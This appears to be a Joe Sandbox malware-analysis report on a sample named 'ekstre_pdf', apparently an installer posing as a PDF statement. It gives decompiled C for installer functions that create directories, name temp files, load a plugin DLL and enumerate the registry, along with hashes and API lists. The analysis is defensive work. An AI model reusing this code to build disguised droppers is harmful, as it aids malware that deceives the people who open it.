API String ID: 2655323295-2603328774
Opcode ID: 16a04fc7546f6915914c7e0bf5901c816dffc05230807052218ae99e8fcd5e4c
Instruction ID: 81901d665d5d15d475f48ec7c9f912b64e1c2e23619fc0d5c65c81baa6794011
Opcode Fuzzy Hash: 16a04fc7546f6915914c7e0bf5901c816dffc05230807052218ae99e8fcd5e4c
Instruction Fuzzy Hash: 22118E71E00118BEEF10AFA5DE89EAEBAB8FF44354F11443AF504F61C1D7B88D40AA58

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Dialectical\\Kombinationsuddannelserne\\Chronogramme\\Eksamenskvotientens144\\Nephrosclerosis\\Dingwall",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405EB7: CharNextW.USER32(?,?,00464270,?,00405F2B,00464270,00464270,759D3420,?,004E0000,00405C69,?,759D3420,004E0000,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,004E0000), ref: 00405AB1

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens14,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens14, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens14
API String ID: 1892508949-3015494402
Opcode ID: 662ecf4c26685e01c0b0cda8832badbe8e5e3123ed8d96dc13cfdc5db4f4a6ab
Instruction ID: 6044273f590f2144788d420e9ac67c297d50bb95fa7553058ce2a536636fe282
Opcode Fuzzy Hash: 662ecf4c26685e01c0b0cda8832badbe8e5e3123ed8d96dc13cfdc5db4f4a6ab
Instruction Fuzzy Hash: 2D11D331504110EBCF216FA5DD4099F36A0EF15369B28493BE545B12E1DA3E4A819A8E

Uniqueness

Uniqueness Score: -1.00%

Function 0040605C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00406062
0x00406068
0x00406069
0x00406069
0x0040606e
0x0040606f
0x00406072
0x00406077
0x0040607a
0x00406084
0x00406091
0x00406095
0x0040609d
0x00000000
0x00000000
0x004060a1
0x00000000
0x004060a3
0x004060a3
0x004060a3
0x004060a6
0x004060a9
0x004060a9
0x004060ac
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040607A
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,004DC000,004E0000,004E0000,004E0000,004E0000,004E0000,004E0000,00403810), ref: 00406095

Strings

nsa, xrefs: 00406069

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768

Uniqueness

Uniqueness Score: -1.00%

Function 6ED6167A Relevance: 4.6, APIs: 3, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6ED6167A(void* __ebx, void* __edx, void* __edi, void* __esi) {
				void* _t37;
				intOrPtr _t43;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t55;
				void* _t56;
				signed char _t62;
				signed int _t64;
				signed int _t66;
				struct HINSTANCE__* _t71;
				void* _t72;
				void* _t80;
				void* _t84;
				void* _t85;
				void* _t87;

				_t80 = __esi;
				_t72 = __edi;
				_t55 = __ebx;
				 *0x6ed65040 =  *((intOrPtr*)(_t87 + 8));
				 *0x6ed6503c =  *((intOrPtr*)(_t87 + 0x94));
				 *0x6ed65038 =  *((intOrPtr*)(_t87 + 0x90));
				 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x9c)) + 0xc))( *0x6ed65014, E6ED6132B, _t84);
				_push("true");
				_t37 = E6ED62351();
				_t85 = _t37;
				if(_t85 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t85 + 4)) != 1) {
						E6ED61FCB(_t85);
					}
					E6ED62049(_t85);
					if( *((intOrPtr*)(_t85 + 4)) == 0xffffffff) {
						L14:
						if(( *(_t85 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t37 = E6ED62209(_t85);
							} else {
								_push(_t55);
								_push(_t80);
								_push(_t72);
								_t64 = 8;
								_t14 = _t85 + 0x1018; // 0x1018
								_t56 = _t14;
								memcpy(_t87 + 0x14, _t56, _t64 << 2);
								_t43 = E6ED61F1E(_t85, _t87 + 0x30);
								 *(_t85 + 0x1034) =  *(_t85 + 0x1034) & 0x00000000;
								 *((intOrPtr*)(_t85 + 0x1020)) = _t43;
								 *_t56 = 4;
								E6ED62209(_t85);
								_t66 = 8;
								_t37 = memcpy(_t56, _t87 + 0x28, _t66 << 2);
							}
						} else {
							E6ED62209(_t85);
							_t37 = GlobalFree(E6ED615EB(E6ED61668(_t85)));
						}
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							E6ED6200D(_t85);
							_t62 =  *(_t85 + 0x1010);
							_t37 = _t62;
							if((_t62 & 0x00000040) != 0 &&  *_t85 == 1) {
								_t71 =  *(_t85 + 0x1008);
								if(_t71 != 0) {
									FreeLibrary(_t71);
									_t37 =  *(_t85 + 0x1010);
								}
							}
							if((_t37 & 0x00000020) != 0) {
								_t37 = E6ED615C5( *0x6ed6502c);
							}
						}
						if(( *(_t85 + 0x1010) & 0x00000002) == 0) {
							_t37 = GlobalFree(_t85); // executed
						}
						goto L28;
					}
					_t49 =  *_t85;
					if(_t49 == 0) {
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							goto L14;
						}
						E6ED62F9F(_t85);
						L12:
						_t85 = _t49;
						L13:
						goto L14;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						L8:
						_t49 = E6ED62D14(_t85); // executed
						goto L12;
					}
					_t51 = _t50 - 1;
					if(_t51 == 0) {
						_push(_t85);
						E6ED617F7();
						goto L13;
					}
					if(_t51 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x6ed6167a
0x6ed6167a
0x6ed6167a
0x6ed61684
0x6ed61690
0x6ed6169d
0x6ed616b4
0x6ed616b7
0x6ed616b9
0x6ed616be
0x6ed616c3
0x6ed617ef
0x6ed617f6
0x6ed616c9
0x6ed616cd
0x6ed616d0
0x6ed616d5
0x6ed616d7
0x6ed616e1
0x6ed61719
0x6ed61720
0x6ed61744
0x6ed61792
0x6ed61746
0x6ed61746
0x6ed61747
0x6ed61748
0x6ed6174b
0x6ed61750
0x6ed61750
0x6ed6175d
0x6ed61760
0x6ed61765
0x6ed6176d
0x6ed61773
0x6ed61779
0x6ed61789
0x6ed6178a
0x6ed6178e
0x6ed61722
0x6ed61723
0x6ed61738
0x6ed61738
0x6ed6179c
0x6ed6179f
0x6ed617a5
0x6ed617ab
0x6ed617b0
0x6ed617b8
0x6ed617c0
0x6ed617c3
0x6ed617c9
0x6ed617c9
0x6ed617c0
0x6ed617d1
0x6ed617d9
0x6ed617de
0x6ed617d1
0x6ed617e6
0x6ed617e9
0x6ed617e9
0x00000000
0x6ed617e6
0x6ed616e6
0x6ed616e9
0x6ed6170e
0x00000000
0x00000000
0x6ed61711
0x6ed61716
0x6ed61716
0x6ed61718
0x00000000
0x6ed61718
0x6ed616eb
0x6ed616ee
0x6ed616fa
0x6ed616fb
0x00000000
0x6ed616fb
0x6ed616f0
0x6ed616f3
0x6ed61702
0x6ed61703
0x00000000
0x6ed61703
0x6ed616f8
0x00000000
0x00000000
0x00000000
0x6ed616f8

APIs

Part of subcall function 6ED62351: GlobalFree.KERNEL32(?), ref: 6ED62A44
Part of subcall function 6ED62351: GlobalFree.KERNELBASE(?), ref: 6ED62A4A
Part of subcall function 6ED62351: GlobalFree.KERNEL32(?), ref: 6ED62A50

GlobalFree.KERNEL32(00000000), ref: 6ED61738
FreeLibrary.KERNEL32(?), ref: 6ED617C3
GlobalFree.KERNEL32(00000000), ref: 6ED617E9

Part of subcall function 6ED61FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 6ED61FFA

Part of subcall function 6ED617F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6ED61708,00000000), ref: 6ED6189A

Part of subcall function 6ED61F1E: wsprintfW.USER32 ref: 6ED61F51

Memory Dump Source

Source File: 00000000.00000002.3063969058.000000006ED61000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ED60000, based on PE: true

Associated: 00000000.00000002.3063862656.000000006ED60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064061225.000000006ED64000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064139209.000000006ED66000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ed60000_ekstre_pdf.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-0
Opcode ID: 49f542534e67d2ee9115aef617ad749bcfd7d8e7fc28aa5aa28d4709fd996dc2
Instruction ID: e2ab22085909a2ebb75efe9d85e42665fb1bc7768a1ea18d21449d36c9fdc5cf
Opcode Fuzzy Hash: 49f542534e67d2ee9115aef617ad749bcfd7d8e7fc28aa5aa28d4709fd996dc2
Instruction Fuzzy Hash: 2141BE3640424AEFDBA09FE8D854BDA37ECBB01319F008819F99D9E182DB74E58DC661

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x47afc0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x47af88 =  *0x47af88 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6("true");
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x2000, _t37, 0x41e650, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x004020d8
0x004020d8
0x004020dd
0x004020e4
0x004021a3
0x004022f1
0x004022f1
0x00402c2a
0x00402c2d
0x00402c39
0x00402c39
0x004020f3
0x004020fd
0x00402100
0x00402110
0x00402114
0x0040211a
0x0040211c
0x0040211f
0x0040219c
0x00000000
0x0040219c
0x00402121
0x0040212c
0x00402130
0x00402170
0x00402132
0x00402135
0x00402138
0x00402164
0x0040213a
0x0040213d
0x00402146
0x00402148
0x00402148
0x00402146
0x00402138
0x00402178
0x00402191
0x00402191
0x00000000
0x00402178
0x00402103
0x0040210b
0x0040210e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402103

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,00000000,004343DD,759D23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,00000000,004343DD,759D23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 64e1b476dac441d8f2ffc935dfdaa1e42e95a69227b61d2c3ae4126ab0b3702b
Instruction ID: f86192d91c9495b446131f1aff0374b747aaa88cef60d1ff34758b9e24b31dad
Opcode Fuzzy Hash: 64e1b476dac441d8f2ffc935dfdaa1e42e95a69227b61d2c3ae4126ab0b3702b
Instruction Fuzzy Hash: 3D21F231900104FACF11AFA5CE48A9D7A71BF48394F20013BF505B91E1DBBD8A92961E

Uniqueness

Uniqueness Score: -1.00%

Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B9B(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				char* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x28));
				_t33 =  *0x41e650; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x4004); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E0040657A(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
						_t12 =  *0x41e650; // 0x0
						 *_t34 = _t12;
						 *0x41e650 = _t34;
					} else {
						if(_t33 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t33 + 4; // 0x4
							E0040653D(_t30, _t3);
							_push(_t33);
							 *0x41e650 =  *_t33;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t33 == _t28) {
							break;
						}
						_t33 =  *_t33;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t33 == _t28) {
								break;
							} else {
								_t36 = _t33 + 4;
								_t32 = L"Call";
								E0040653D(_t32, _t33 + 4);
								_t22 =  *0x41e650; // 0x0
								E0040653D(_t36, _t22 + 4);
								_t25 =  *0x41e650; // 0x0
								_push(_t32);
								_push(_t25 + 4);
								E0040653D();
								L15:
								 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E0040657A(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405B9D();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

0x00401b9b
0x00401b9b
0x00401b9e
0x00401ba6
0x00401bef
0x00401c1d
0x00401c26
0x00401c28
0x00401c2c
0x00401c31
0x00401c36
0x00401c38
0x00401bf1
0x00401bf3
0x0040292e
0x00401bf9
0x00401bf9
0x00401bfe
0x00401c05
0x00401c06
0x00401c0b
0x00401c0b
0x00401bf3
0x00000000
0x00401ba8
0x00401ba8
0x00401ba8
0x00401bab
0x00000000
0x00000000
0x00401bb1
0x00401bb5
0x00000000
0x00401bb7
0x00401bb9
0x00000000
0x00401bbf
0x00401bbf
0x00401bc2
0x00401bc9
0x00401bce
0x00401bd8
0x00401bdd
0x00401be2
0x00401be6
0x00402a94
0x00402c2a
0x00402c2d
0x00402c33
0x00402c33
0x00401bb9
0x00000000
0x00401bb5
0x0040238a
0x00402397
0x00402398
0x0040239d
0x0040239d
0x00402c35
0x00402c39

APIs

GlobalFree.KERNEL32(00000000), ref: 00401C0B
GlobalAlloc.KERNELBASE(00000040,00004004), ref: 00401C1D

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,00000000), ref: 00406779

Strings

Call, xrefs: 00401BC2, 00401BC8, 00401BE2

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Global$AllocFreelstrcatlstrlen
String ID: Call
API String ID: 3292104215-1824292864
Opcode ID: 9db9e4be607ba88ee621aa12fb78ab8bc12d8fca90f8d50b8b958ba682be51b9
Instruction ID: 892a35a495c4ab8b121360a0f63705a8407c3d5515d9716e2647dc9d5b998a2c
Opcode Fuzzy Hash: 9db9e4be607ba88ee621aa12fb78ab8bc12d8fca90f8d50b8b958ba682be51b9
Instruction Fuzzy Hash: 58210872A04210ABDB20AFA9ED84A9E73B4EF14354791493BF552F72C0D778EC414B1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402DE6(_t29, 0x20019); // executed
				_t24 = _t9;
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x1fff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x1fff);
					}
					_t22[0x1fff] = _t16;
					_push(_t24);
					RegCloseKey();
				}
				 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x0040259e
0x0040259e
0x0040259e
0x004025a3
0x004025aa
0x004025ac
0x004025b4
0x004025b7
0x004025ba
0x0040292e
0x004025c0
0x004025c8
0x004025cb
0x004025e4
0x004025ea
0x004025ec
0x004025ee
0x004025ee
0x004025cd
0x004025d1
0x004025d1
0x004025f5
0x004025fc
0x004025fd
0x004025fd
